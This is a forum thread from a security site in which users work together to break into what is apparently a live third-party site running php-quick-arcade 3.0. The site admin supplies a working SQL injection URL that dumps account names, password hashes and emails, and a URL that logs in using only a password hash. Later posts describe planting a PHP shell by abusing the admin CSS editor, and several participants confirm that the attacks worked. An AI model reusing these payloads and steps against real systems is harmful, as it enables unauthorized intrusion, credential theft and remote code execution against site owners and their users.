 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL |
 |
 Posted: Sat Nov 08, 2008 9:42 pm |
 |
|
| slsl |
| Advanced user |
 |
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
 |
|
 |
|
alright i guess im gonna come back to this mysql error, i think i probably cant do anything with it but waraxe said to post the error... first of all this is php-quick-arcade 3.0 and is open source if anyone wants to look at it..
a regular url request looks like this
| Code: | | http://***********.com/arcade/?search=content+here&by=game&searchcat=All&action=search |
and if i change the by variable to ' it gives me the following pop up errors
| Code: | Database Error: You have an error in your sql syntax; check the manual that corresponds to your MySQL server version for the right for the right syntax near '' LIKE '%content+here%' ORDER BY id DESC)' at line 1
|
then it says
| Code: | | Query used: (SELECT gameid,game,about,Champion_name,Champion_score,times_played, FROM phpqa_games ORDER BY rand() LIMIT 1) UNION ALL (SELECT gameid,game,about,Champion_name,Champion_score,times_played, FROM phpqa_games WHERE '' LIKE '%content+here%' ORDER BY id DESC) |
i hope thats enough information for someone to tell me if i can do anything  also if i remember right the user table is phpqa_users which you could probably infer
EDIT:
some more information after i do that there is an error printed on the screen | Code: | | Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/*******/public_html/arcade/Arcade.php on line 2030 |
also if I change the by variable to random letters i get | Code: | | Database error: Unkown column 'random' in ' where clause ' |
|
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 10:44 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, tested this on my local server and exploiting was kinda complicated.
Still, there is working exploit:
| Code: |
http://localhost/phpqav.3.0.20/Arcade.php?search=zz&action=search&by=about>0+ORDER+BY+id+DESC)+UNION+ALL+(SELECT+1,2,CONCAT_WS(0x3a,id,name,pass,email),4,5,6+FROM+phpqa_accounts+ORDER+BY+id+ASC)--+
|
By the way, password hashing algorithm is custom:
| Code: |
$pass = md5(sha1(htmlspecialchars($_POST['postpassword'])));
|
Still, there can be possibility to craft cookies and get in without cracking the hash. But this is just guess, more analyze is needed  |
|
|
|
|
| Posted: Sat Nov 08, 2008 10:48 pm |
|
|
| slsl |
| Advanced user |
|
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 11:16 pm |
|
|
| slsl |
| Advanced user |
|
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
|
|
|
|
Waraxe do you know how i can make a dll file to use for inside pro to use this algorithm or atleast can you help me crack and by the way it is possible to forge the cookie but im also looking to gain acess to other parts of the site
| Code: |
411764de7c9ead24a62c08186a038d86 |
|
|
|
|
|
| Posted: Sat Nov 08, 2008 11:48 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
I have found easy way to get logged in with username and password hash. And that's without any cookie crafting. Just issue the request:
| Code: |
http://localhost/phpqav.3.0.20/Arcade.php?action=login&recovery=1&userID=Admin&pword=0c7540eb7e65b553ec1ba6b20de79608
|
Let me know about results
P.S.
| Code: |
http://localhost/phpqav.3.0.20/Arcade.php?cparea=addgames&method=upload
|
Looks like easy way to upload php shell |
|
|
|
|
| Posted: Sat Nov 08, 2008 11:54 pm |
|
|
| slsl |
| Advanced user |
|
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
|
|
|
|
| thanks dude it worked nvm about that passcracking i got it and im gonna change it to ill see about the upload game |
|
|
|
|
| Posted: Sun Nov 09, 2008 12:17 am |
|
|
| slsl |
| Advanced user |
|
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
|
|
|
|
| when i try to upload my php code it says that the game id is invalid |
|
|
|
|
| Posted: Sun Nov 09, 2008 12:35 am |
|
|
| slsl |
| Advanced user |
|
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
|
|
|
|
| nevermind i got it i loaded php script via the stylesheets |
|
|
|
|
| Posted: Fri Jun 05, 2009 4:46 am |
|
|
| JasonB |
| Regular user |
|
|
| Joined: Apr 05, 2009 |
| Posts: 23 |
|
|
|
|
|
|
|
| slsl wrote: | | nevermind i got it i loaded php script via the stylesheets |
How'd you manage that?
I'm trying and failing.
| Code: | if ($_POST['addcssfile']) {
vsess();
$fp = fopen("./skins/".$_POST['skincssfilename'].".css","w+"); |
Wouldn't that just make everything PHP open as text on a .css? |
|
|
|
|
| Posted: Sat Jun 06, 2009 11:47 pm |
|
|
| slsl |
| Advanced user |
|
|
| Joined: Oct 14, 2008 |
| Posts: 66 |
|
|
|
|
|
|
|
| Jason, unless it's been patched (which I doubt) what I did was when in the admin panel I go to the page where you can edit the css and in the url bar I change where it shows the filename of the css file to a php file and i load that page and in the text box you can edit the source of the php file your making and when you save it it will save to http://localhost/arcade/skins/whateverwasinurl.php and you can run it from there |
|
|
|
|
| Posted: Sun Jun 07, 2009 12:28 am |
|
|
| JasonB |
| Regular user |
|
|
| Joined: Apr 05, 2009 |
| Posts: 23 |
|
|
|
|
|
|
|
| Hey, that worked well, thanks. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 73
Members: 0
Total: 73
